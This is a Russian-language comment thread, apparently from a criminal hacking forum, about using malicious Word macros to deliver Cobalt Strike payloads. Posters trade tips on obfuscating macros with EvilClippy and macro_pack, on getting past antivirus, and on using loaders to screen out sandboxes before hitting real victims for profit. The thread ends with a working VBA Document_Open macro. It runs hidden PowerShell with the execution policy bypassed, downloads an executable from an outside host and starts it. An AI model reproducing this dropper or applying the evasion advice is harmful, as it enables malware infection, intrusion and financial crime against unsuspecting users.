Пожалуйста, обратите внимание, что пользователь заблокирован
да поэтому мне нравится эта статья, что тут описано как сразу делать elevate правникто тебе не даст влезть в реестр если ты не под админом.
Криптон молодчага!
да поэтому мне нравится эта статья, что тут описано как сразу делать elevate правникто тебе не даст влезть в реестр если ты не под админом.
Статья отличная, но можно тот же кобальт заменить чем угодно, обфускация кобальту уже не помогаетЗлая клиппи уже удрочена,господа,кобальт надо обфусцировать,привелегии надо подымать но если там какой-нить касперский,или нод- то не так все просто)Вообще-то статья хорошая для тех кто начинает осваивать..
За Эмпайр теперь BC-Security взялись. Вроде ничего Я тестил всё ок. Посмотри может тебе тоже понравится.Можно, ну лучше его совсем переписать, старина Рафи уже не удел, PShell-тоже(перписать), жаль эмпайр,забросили - проект. Мб кто знает чела который пилит реализацию павер-шелла? Стукните в личку, вниманием не обделим.
Вот ты мыслишь с позитции как лучше. Лучшее враг хорошего, турецкие школьники досих пор льют анубисa - зарабатывая на хлеб с маслом. Борька вон паблик сплоитом, и изи техникой ложит крупных корпов. Для работяг\трудяг пойдет. И вообще паблик наше все. Кто тут имеет приват-с и воротит нос от фрэймворков\сборок\уже-готового-и-детектящясего? важен же результат и только. На конти глянь, манулы-ёмаё(без-слез-не-взглянешь) , да мимик чист, но и этого не большого набора им вполне хватает на поддержание хорошей статы.
Посмотреть вложение 25532
как заставить половину населения планеты подписывать макросы ?) Я думаю,они оставят это дело на пользователя.Мол сам включишь настройки какие надоспустя эволюцию макросов додумались использовать CreateProcess только в 2020 году, а до этого они использовали shell даже при APT векторах и в целом точечной работе, технологии! развиваемся! к сожалению до сих пор считают powershell лучшим из лучших в этом плане, ну ничего! подождем 4 года, Microsoft будет разрешать только подписанные макросы, тогда они поймут
2) Макросы в Word. Наш вредоносный макрос будет скачивать пэйлоад Powershell созданный в Cobalt Strike
Скажи чем ты там обнюхался? Таким же фишингом и действуют пентестеры... Если хочешь эксплойт который стоит дохуя бабла то тебя никто не останавливает. Подумай сам почему на форуме другие же продают эти макросы? Да потому что это эффективно в реальных атаках.Статья хлам чисто вот по этому:
Это как ядерной ракетой по воробьям стрелять.. Щас видимо тренд такой новый, начитаться овердохуя теории и таким же лунтикам советы раздавать...
макрос сильно универсален для любой тачки. Больше по этому.Скажи чем ты там обнюхался? Таким же фишингом и действуют пентестеры... Если хочешь эксплойт который стоит дохуя бабла то тебя никто не останавливает. Подумай сам почему на форуме другие же продают эти макросы? Да потому что это эффективно в реальных атаках.
Тебя клоуна забанили на приеме ты думаешь второй раз проканает)))) школьник здесь ты, если ты действуешь точечно ,то тебе не потребуется фильтровать шлак,клоунТолько школьники теоретики вроде вас грузят кобу через доки)))) нормальные ребята грузят лоадер, фильтруют всякую нечесть и шлак, а уже после шлют отборных ботов на кобу. с лоадера. А вы да, можете прогрузить кобу сразу аттачем и радоваться абузам а не бабкам. Успехов в теории...
чего он не так сказал? всё правильно,все по схеме. Сначала лодырь,отсев ловушек,дальше уже удар по реальным юзверям.Тебя клоуна забанили на приеме ты думаешь второй раз проканает)))) школьник здесь ты, если ты действуешь точечно ,то тебе не потребуется фильтровать шлак,клоун
Я не исключал возможность сразу подгружать лодырь. Если ты очень хорошо "прошаренный" чем я, напиши об этом статью, с удовольствием почитаю.Только школьники теоретики вроде вас грузят кобу через доки)))) нормальные ребята грузят лоадер, фильтруют всякую нечесть и шлак, а уже после шлют отборных ботов на кобу. с лоадера. А вы да, можете прогрузить кобу сразу аттачем и радоваться абузам а не бабкам. Успехов в теории...
И вообще я статью писал именно про кобальт и макросы. Никто тебе в здравом уме, не будет давать криптованный лоадер в статьях.Только школьники теоретики вроде вас грузят кобу через доки)))) нормальные ребята грузят лоадер, фильтруют всякую нечесть и шлак, а уже после шлют отборных ботов на кобу. с лоадера. А вы да, можете прогрузить кобу сразу аттачем и радоваться абузам а не бабкам. Успехов в теории...
Это как расшифровать?)Никто тебе в здравом уме, не будет давать криптованный лоадер в статьях.
подскажите аналоги EvilClippy, за ранее благодарю
У кого нибудь есть про версия Macro Pack нигде не могу найти...?![]()
Releases · sevagas/macro_pack
macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments...github.com
Мозгом.Это как расшифровать?)
вместо cmd и powershella можно использовать загрузку и запуск через bitsadminэто паблик убитый ))
Код:Private Sub Document_New() End Sub Private Sub Document_Open() Call Shell("Cmd /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://disk.karelia.pro/m9UmrQ2/1.jpg','C:\ProgramData\1.exe');Start-Process 'C:\ProgramData\1.exe'") End Sub